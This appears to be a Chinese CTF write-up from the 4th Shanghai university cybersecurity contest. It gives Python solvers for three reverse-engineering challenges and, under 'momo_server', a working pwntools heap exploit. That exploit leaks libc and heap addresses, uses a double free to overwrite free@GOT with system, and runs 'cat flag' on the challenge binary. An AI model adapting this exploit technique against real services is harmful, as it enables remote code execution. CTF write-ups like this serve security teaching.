[第四届上海市大学生网络安全大赛] writeups

2018-12-02  本文已影响0人  2mpossible

what is it

import hashlib
import itertools

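def md5_crypto(data):
    """Return the hex MD5 digest of *data*.

    Args:
        data: bytes or str.  A str is UTF-8 encoded first, so the helper works
            both on Python 2 (where str already is bytes) and on Python 3,
            where ``hashlib`` rejects text.

    Returns:
        The 32-character lowercase hexadecimal digest.
    """
    if not isinstance(data, bytes):
        data = data.encode("utf-8")
    return hashlib.md5(data).hexdigest()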

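CHARSET = [chr(i) for i in range(97, 123)]  # lowercase a-z
TARGET_SCORE = 403  # the value the binary checks (10 * v15 + v14 == 403)


def zero_score(hexdigest):
    """Score a hex digest by its '0' characters: 10 * count + sum of positions.

    This is the check the decompiled binary applies to the MD5 of the input
    (``v15`` counts the zeros, ``v14`` accumulates their indices).

    Args:
        hexdigest: a hex string; every character is inspected.

    Returns:
        ``10 * len(zeros) + sum(zero_positions)`` as an int.
    """
    positions = [k for k, ch in enumerate(hexdigest) if ch == '0']
    return 10 * len(positions) + sum(positions)


def search(charset=CHARSET, length=6, target=TARGET_SCORE):
    """Return the first *length*-character string over *charset* whose MD5
    has ``zero_score`` equal to *target*.

    Candidates are enumerated in ``itertools.product`` order, so the result is
    the same string the original top-level loop printed before exiting.

    Raises:
        ValueError: when no candidate over the search space matches.
    """
    for combo in itertools.product(charset, repeat=length):
        candidate = "".join(combo)
        if zero_score(md5_crypto(candidate)) == target:
            return candidate
    raise ValueError(
        "no string of length %d over the charset scores %d" % (length, target)
    )


if __name__ == "__main__":
    # Guarded so importing the module does not start the 26**6 brute force.
    print(search())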

cpp

# Program logic (reconstructed from the binary; a1/a/s are not defined here).
# Pass 1: a[i] = ((a1[i] >> 6) | (4 * a1[i])) ^ i, truncated to one byte.
# For a byte-sized a1[i] the OR of the two shifts is a rotate-left by 2.
for i in range(len(a1)):
    v2 = 4 * a1[i]
    a[i]= ( ((a1[i]) >> 6 | v2) ^ i ) & 0xff


# Pass 2, repeated four times: each byte is combined with its predecessor.
# For byte values (x | y) & (0xffffffff - (x & y)) equals x ^ y, so this is a
# running XOR with the previous byte.
# NOTE(review): the loop bound uses len(s) while indexing a1, and pass 1
# writes `a` while pass 2 reads `a1` -- presumably the same buffer in the
# original program; confirm against the disassembly before reusing this.
for i in range(4):
    for j in range(1,len(s)):
        v2 = a1[j]
        v3 = a1[j-1] | v2
        a1[j] = ( v3 & ( 0xffffffff - (a1[j] & a1[j-1]) )) & 0xff

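def crypto(i, j):
    """First-stage byte transform of the binary.

    ``(i >> 6) | (4 * i)`` moves bits 0-5 of *i* up by two and bits 6-7 down
    to the bottom (a rotate-left by 2 for a byte-sized *i*); the position *j*
    is XORed in and ``& 0xff`` drops anything above the byte.
    """
    return (((i >> 6) | (4 * i)) ^ j) & 0xff


# Bytes the binary compares the fully transformed input against.
TARGET = [0x99,0xb0,0x87,0x9e,0x70,0xe8,0x41,0x44,0x05,0x04,0x8b,0x9a,0x74,0xbc,0x55,0x58,0xb5,0x61,0x8e,0x36,0xac,0x09,0x59,0xe5,0x61,0xdd,0x3e,0x3f,0xb9,0x15,0xed,0xd5]


def _diffuse(c):
    """Second stage, in place: four passes of ``c[m] ^= c[m-1]`` for m >= 1.

    The original writes the step as ``(x | y) & (0xffffffff - (x & y))``,
    which equals ``x ^ y`` for byte values.  Returns *c* for convenience.
    """
    for _ in range(4):
        for m in range(1, len(c)):
            c[m] ^= c[m - 1]
    return c


def recover(target=TARGET, prefix='f', alphabet=range(0x20, 0x7f)):
    """Recover the input the two stages map onto *target*, one byte at a time.

    After both stages, position ``m`` of the buffer depends only on input
    bytes 0..m (each pass of ``_diffuse`` walks upward and mixes ``c[m]`` with
    ``c[m-1]`` only), so a known *prefix* can be extended by trying each value
    of *alphabet* at the next position and keeping the one whose transformed
    buffer agrees with *target* there.

    Args:
        target: expected output bytes.
        prefix: known leading characters of the input (``'f'`` for this flag).
        alphabet: candidate byte values, printable ASCII by default.

    Returns:
        The recovered input string of ``len(target)`` characters.

    Raises:
        ValueError: when no candidate matches at some position (the original
            script looped forever in that case).
    """
    flag = prefix
    for num in range(len(flag), len(target)):
        # The prefix's first-stage bytes do not change across candidates.
        known = [crypto(ord(ch), k) for k, ch in enumerate(flag)]
        for cand in alphabet:
            buf = _diffuse(known + [crypto(cand, num)])
            if buf[num] == target[num]:
                flag += chr(cand)
                break
        else:
            raise ValueError("no candidate in alphabet matches target[%d]" % num)
    return flag


if __name__ == "__main__":
    print(recover())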

cyvm

0F 10 14 20 10 16 00 09  24 02 15 16 E9 12 16 E8
02 17 16 13 16 90 06 15  17 45 06 15 16 76 01 15
16 12 16 FF 0A 14 16 0C  09 0E ?? ?? ?? ?? ?? ??

0f scanf
09 jmp
0c cmp

scanf('%s',s)

*(&v7 + *(v5 + 1 + a1) -20) = *(v5 + 2 + a1)

# Hand-traced semantics of the VM bytecode above.  Not runnable as-is: ``s``
# and ``v7`` come from the disassembly, and ``++i`` is C notation.
v7[0] = 0x20
i = 0x00
v5 = 0x24

# Loop control: while i != 0x20 jump back (v5 = 0x9), otherwise skip ahead by
# two.  v5 looks like the VM's program counter -- inferred from the jmp/cmp
# opcode table, not proven.
if 0x20 != i:
    v5 = 0x9
else:
    v5 += 2

# Loop body: s[i] = s[i] ^ s[i+1] ^ i
a = s[i]

b = s[i+1]

a ^= b
a ^= i
s[i] = a

++i  # C-style increment from the trace; in Python this is a no-op unary plus

if 0x20 != i:
    v5 = 0x9
else:
    v5 += 2
# The same body as a Python loop.
# NOTE(review): s[i+1] reads one past the end on the last iteration -- the
# real buffer presumably has a trailing byte; the solver below only needs
# cipher indices 0..0x1e.
for i in range(len(s)):
    a = s[i]
    b = s[i+1]
    a ^= b
    a ^= i
    s[i] = a
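# Ciphertext bytes for the cyvm challenge; byte k is input[k] ^ input[k+1] ^ k.
CIPHER = [0x0a, 0x0c, 0x04, 0x1f, 0x48, 0x5a, 0x5f, 0x03, 0x62, 0x67, 0x0e, 0x61, 0x1e, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7c, 0x39, 0x54, 0x4b, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0e, 0x62]


def recover_xor_chain(cipher, prefix='f', length=0x20):
    """Undo ``out[k] = in[k] ^ in[k+1] ^ k`` one character at a time.

    Args:
        cipher: output bytes; only indices ``0 .. length-2`` are read.
        prefix: known leading characters of the input (must be non-empty).
        length: number of input characters to recover.

    Returns:
        The recovered input string of *length* characters (or *prefix*
        unchanged when it is already that long).

    Raises:
        ValueError: when *prefix* is empty, or when the byte implied by the
            cipher at some position is not printable ASCII (0x20..0x7e); the
            original brute force looped forever in that case.
    """
    if not prefix:
        raise ValueError("prefix must contain at least one character")
    flag = prefix
    while len(flag) < length:
        k = len(flag) - 1
        # XOR is its own inverse, so the next character is determined
        # directly instead of by trying every printable byte.
        nxt = cipher[k] ^ ord(flag[k]) ^ k
        if not 0x20 <= nxt <= 0x7e:
            raise ValueError("no printable input byte matches cipher[%d]" % k)
        flag += chr(nxt)
    return flag


if __name__ == "__main__":
    print(recover_xor_chain(CIPHER))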

momo_server

exp:

from pwn import *
from urllib import quote

#context.log_level ='debug'

def http(method, operating, content):
    """Build the request string the challenge server expects.

    Layout: ``<method> <operating> Connection: keep-alive``, a blank line,
    then *content* verbatim.
    """
    head = "%s %s Connection: keep-alive" % (method, operating)
    return "\n\n".join((head, content))

def get_list():
    """Send ``GET /list`` with an empty body over the global connection ``p``."""
    p.send(http('GET', '/list', ''))

def add(memo, count):
    """Send ``POST /add`` with body ``memo=<memo>&count=<count>`` over ``p``."""
    body = "memo=%s&count=%s" % (memo, count)
    p.send(http('POST', '/add', body))

def count():
    """Send ``POST /count`` with an empty body over the global connection ``p``."""
    p.send(http('POST', '/count', ''))

def echo(con):
    """Send ``POST /echo`` with body ``content=<con>`` over the global ``p``."""
    body = "content=%s" % (con,)
    p.send(http('POST', '/echo', body))

# Driver: each attempt spawns a fresh process and any exception restarts the
# whole attempt from scratch (see the except clause at the bottom).
while True:
    try:
        p = process('./pwn')
        libc = ELF('./libc-so.6')

        #leak libc
        echo('0'*0x34 + 'aaaa')
        p.recvuntil('aaaa')
        # The constants used below (0x5f0e14, 0x20, 0xa0, 0x602ffa) are
        # specific to this challenge's binary and bundled libc-so.6.
        libc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x5f0e14
        # Low-byte sanity check on the computed base; a failure raises
        # AssertionError, which the except below turns into a silent retry.
        assert libc_base & 0xff == 0
        log.success('libc base addr : 0x%x'%libc_base)
        system_addr = libc_base + libc.symbols['system']
        log.success('system addr : 0x%x'%system_addr)


        add('a'*0x60,'1')
        add('b'*0x60,'2')
        add('c'*0x60,'3')
        add('d'*0x60,'4')
        add('e'*0x60,'200')


        #leak heap_base
        count()
        sleep(4)
        get_list()
        p.recvuntil('0</td></tr><tr><td>')
        heap_base = u64(p.recvuntil('\x3c',drop = True).ljust(8,'\x00')) -0x20 
        log.success('heap_base addr : 0x%x'%heap_base)

        #double free
        add(p64(heap_base+0xa0).replace('\0', ''),'1')  # 0 -> 1 -> 0
        sleep(3)
        
        #hijack fd -> 0x602ffa
        add(quote(p64(0x602ffa).ljust(0x60,'a')),'200') # 1 -> 0 -> 0x602ffa
        sleep(1)

        add(quote('bbbbbbbbb'.ljust(0x60,'a')),'200') # 0 -> 0x602ffa
        sleep(1)

        #cat flag
        add(quote('cat flag\x00'.ljust(0x60,'a')),'3')
        sleep(1)
        #gdb.attach(p,'b *0x401482')
        #hijack got@free -> system and trigger system('cat flag')
        add(quote(('a'*14 + p64(system_addr)).ljust(0x60,'a')),'200')

        p.interactive()

    except Exception as e:
        # NOTE(review): every failure (a wrong offset, a recv/parse error, the
        # assert above) is swallowed without logging, so a systematic mistake
        # is indistinguishable from an unlucky run; `e` is never used, and `p`
        # is unbound here if process() itself raised.
        p.close()

参考文章:


